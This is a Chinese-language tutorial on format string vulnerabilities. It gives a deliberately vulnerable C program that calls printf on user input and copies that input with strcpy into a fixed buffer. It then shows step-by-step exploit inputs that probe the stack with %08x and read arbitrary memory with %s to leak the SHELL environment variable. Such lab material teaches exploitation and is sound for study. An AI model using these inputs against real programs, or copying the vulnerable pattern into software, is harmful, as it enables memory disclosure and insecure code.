漏洞目标代码:
//fmtstr.c
#include<stdlib.h>
int main(int argc,char *argv[]){
static int canary=0;
char temp[2048];
strcpy(temp,argv[1]);
printf(temp);
printf("\n");
printf("Canary at 0x%08x=0x%08x\n",&canary,canary);
}
可以看出,漏洞代码允许用户指定printf的格式串,可自行构造
[root@Lynx gray]# ./fmtstr "AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x"
AAAA bffffa1a 00000200 464c457f 00010101 00000000 00000000 00030003 00000001 004eff0a 41414141
一直增加%08x,直到出现414141,也就是AAAA所在的栈的位置
当把最后一个%08x换成%s后会出现“段错误”
主要是%s试图读取内存的位置,用该位置的数据作为指针,指向别处,此处指向地址41414141,超出内存范围,所以会报错,由此可知,只要把这个地方换成任意正确的地址,就可以读取出这里保存的数据内容,也就是把"AAAA"替换成合法的内存地址。
获得某一环境变量的指针的辅助程序代码
//getenv.c
#include<stdlib.h>
int main(int argc,char *argv[])
{
char *addr;
addr=getenv(argv[1]);
printf("%s is located at %p\n",argv[1],addr);
}
[root@Lynx gray]# ./getenv SHELL
SHELL is located at 0xbffffa8c
可以看到保存SHELL的位置信息了,想获得具体内容吗?
[root@Lynx gray]# ./fmtstr `printf "\x8c\xfa\xff\xbf"`" %08x %08x %08x %08x %08x %08x %08x %08x %08x %s" bffffa1c 00000200 464c457f 00010101 00000000 00000000 00030003 00000001 004eff0a /bin/bash
其中"/bin/bash"就是"0xbffffa8c"这个地址的内容,获得了SHELL环境变量的内容。